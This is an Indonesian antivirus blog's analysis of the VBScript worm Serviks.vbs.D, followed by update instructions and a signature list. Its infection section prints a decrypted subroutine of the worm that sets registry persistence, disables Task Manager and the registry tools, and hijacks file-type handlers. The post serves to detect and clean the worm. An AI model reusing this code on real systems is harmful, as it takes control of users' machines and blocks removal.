Home > Analisa Virus, Antivirus, Pengumuman > Serviks.vbs.D: Kembalinya Serviks Maker

Serviks.vbs.D: Kembalinya Serviks Maker

December 17th, 2011 Leave a comment Go to comments

Serviks.vbs.D. Dengan munculnya lagi varian Serviks.vbs ini,  mungkin dapat disimpulkan bahwa sang pembuat Serviks (serviks maker) ini merupakan salah satu virus maker yang paling eksis membuat worm tipe VBS (VB Script). Sampelnya kali ini kami dapatkan dari IP yg berasal dari Semarang. Tidak banyak yang berubah, tetap tampil dengan teknik enkripsi dan pesan cinta seperti yang terlihat pada gambar di atas.

A. Info File
Nama Worm : Serviks.vbs.D
Asal : Semarang
Ukuran File : 16.7 KB (17,138 bytes)
Packer : ~
Pemrograman : Visual Basic Script (VBS)
Icon : INI file
Tipe : Worm

B. About Malware
Berdasarkan data yang kami miliki, varian Serviks sebelumnya yang berukuran 11.0 KB (11,330 bytes) dan didapatkan cukup menyebar adalah Serviks.vbs.B. Pada bagian awal script, dibuat seolah-olah adalah hanya komentar yang tidak memiliki maksud terntentu.

'http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&ar=runonce&pver={SUB_PVER}&plcid={SUB_CLSID}
'Microsoft Windows Corporation
' ========================
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TF85
'EA66
'WC55
'WE38
'SB40
'DO25
'SO51
'LK88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'CN50
'DO28
'GV51
'KI68
'OA90
'P-84

Pada karakter ke-2 dari komentar di atas mengandung karakter yang jika di susun akan  menjadi sebuah kalimat pesan dari serviks maker.

JIKA-SERVIKS-MASUK-DI-KOMPUTER-ANDA!-HUBUNGI-FACEBOOK:-ZERVIKS@YAHOO.COM–BY:-FANDI-LOVE-NOVIA-.

C. Companion/File yang dibuat
Pada tanggal tertentu, serviks.vbs.D akan membuat shortcut dengan nama yang berbeda. Sama halnya dengan varian yang sebelumnya, target dari foldernya mengarah kepada file dekstop.ini dengan parameter //e:VBScript untuk menjalankan host Serviks.vbs.D.

D. Hasil Infeksi
Serviks.vbs.B juga melakukan injeksi ke beberapa entry pada registry. Seperti yang terlihat pada potongan sub dari script Serviks.vbs.D yang sudah didekripsi.

Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Serviks"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""
end if
ws.regdelete "HKCR\lnkfile\IsShortcut"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.bendot.webs.com"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Userinet","userinet.exe //e:VBScript """+tmp+"\serviks.sys"""
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinServ","Wscript.exe //e:VBScript """+tmp+"\serviks.sys"""
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\avgnt","userinet.exe //e:VBScript """+ltkc+"\dekstop.ini"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault","Akhirnya Virus Serviks Bisa Masuk Ke PC Anda"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault","Akhirnya Virus Serviks Bisa Masuk Ke PC Anda"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit","c:\windows\system32\userinit.exe,userinet.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\inifile\shell\Delete\Command\", "userinet.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\inifile\shell\Open\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\infile\shell\Delete\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\exefile\shell\Delete\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\sysfile\shell\Delete\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\lnkfile\shell\Delete\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\regfile\shell\Merge\Command\", "userinet.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\inffile\shell\Install\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\VBSfile\shell\Open\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
ws.RegWrite "HKCR\VBEfile\shell\Open\Command\", "Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
if lcase(fso.getdrive("c:").FileSystem)="ntfs" then
erdQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(tmp+"\novia.doc",2,true)
jjk.write erdQ
jjk.close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+docx+"\svchost.exe"""
end if
End Sub

Yang paling terlihat adalah pada message “Hide protected operating system files (Recomended)”. Yang seharusnya adalah :

“You have chosen to display protected operating system files (files labeled System and Hidden) in Windows Explorer.

These files are required to start and run Windows. Deleting or editing them can make your computer inoperable.
Are you sure you want to display these files?

Dirubah menjadi :
Akhirnya Virus Serviks Bisa Masuk Ke PC Anda

Perubahann juga terlihat pada main page dari Internet Explorer yang langsung di arahkan ke website serviks maker.

E. Pembersihan

PCMAV 6.1 Update Build2

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 6.1 Update Build2 telah hadir dengan penambahan 75 pengenal varian virus baru. Bagi Anda pengguna PCMAV 6.1, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 6.1 Update Build2:
AryaN
AryaN.inf
AryaN.lnk
BlackLabel.A
BlackLabel.B
BlackLabel.C
BlackLabel.C.tmp
BlackLabel.D
BlackLabel.D.exe
BlackLabel.drp
BlackLabel.E
BlackLabel.F
BlackLabel.F.exe
BlackLabel.G
BlackLabel.H
BlackLabel.I
BlackN
BlackN.cpl
BlackN.lnk
Chat-FB.J
Chat-FB.K
Chat-FB.L
Chat-FB.M
Chat-FB.N
Chat-FB.O
Chat-FB.P
Chat-FB.Q
Chat-FB.R
Chat-FB.S
Chat-FB.T
Chat-FB.U
Chat-FB.V
Chat-FB.W
Chat-FB.X
Chat-FB.Y
Chat-FB.Z
FakeDownloader.BM
Halted.B
Hasmi.C
Jrush
Jrush.job
Kakkek
MateInfect
MateInfect.bat
MateInfect.html
MateInfect.inf
MateInfect.lnk.A
MateInfect.lnk.B
MateInfect.vbs.A
MateInfect.vbs.B
MateInfect.zip.A
MateInfect.zip.B
MateInfect.zip.C
NgrBot.D.inf
NgrBot.K
NgrBot.K.exe
NgrBot.L
NgrBot.M
NgrBot.M.exe.A
NgrBot.M.exe.B
NgrBot.M.exe.C
NgrBot.N
NgrBot.O
NgrBot.P
Penghianat
Penghianat.vbs
Serviks.vbs.D
Serviks.vbs.D.doc
Serviks.vbs.D.tmp
Serviks.vbs.D.vbe
SetDebug
SuperFly
TheBe
WmplayerC.lnk
Zuagangs

Categories: Analisa Virus, Antivirus, Pengumuman Tags:
  1. hari
    December 18th, 2011 at 07:17 | #1

    Pagi ini sekitar jam 07.00 WIB; automatic update belum bisa update ke Build 2.
    Jadi harus diperbarui secara manual dari sendspace.